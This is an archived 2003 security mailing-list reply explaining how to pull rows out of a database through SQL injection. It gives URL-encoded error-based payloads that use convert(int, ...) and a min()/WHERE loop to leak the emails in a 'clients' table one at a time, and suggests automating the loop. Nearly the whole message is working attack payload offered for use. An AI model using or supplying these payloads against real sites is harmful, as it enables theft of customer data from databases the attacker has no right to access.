Hosting Provided By

RE: SQL injection - get more values

From: Brass, Phil (ISS Atlanta) <PBrass(at)iss.net>
Date: Wed Feb 12 2003 - 14:05:02 EST

I believe the solution you're looking for is the old min-where-order-by trick.

> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b
'

Try this:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a'
order by 1)) %2b '

After you get the first value (say it's anon@isp.com), you throw it into the where clause:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'anon@isp.com' order by 1)) %2b '

You get the next value, say it's axon@isp.com, then you do the next query:

> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email >
'axon@isp.com' order by 1)) %2b '

And so on, until you don't get an error. Of course, for most gratifying results you write a little program that does this for you.

Do you need help?

Phil

> -----Original Message-----
https://alerts.securityfocus.com/

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ Received on Wed Feb 12 16:34:09 2003

This message: [ Message body ]
Next message: kevin mckay: "Re: linux l0pht"
Previous message: Thaidn: "Re: SQL injection - get more values"
Maybe in reply to: Daniel Savi: "SQL injection - get more values"
In reply to Panos Dimitriou: "RE: SQL injection - get more values"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:32 EDT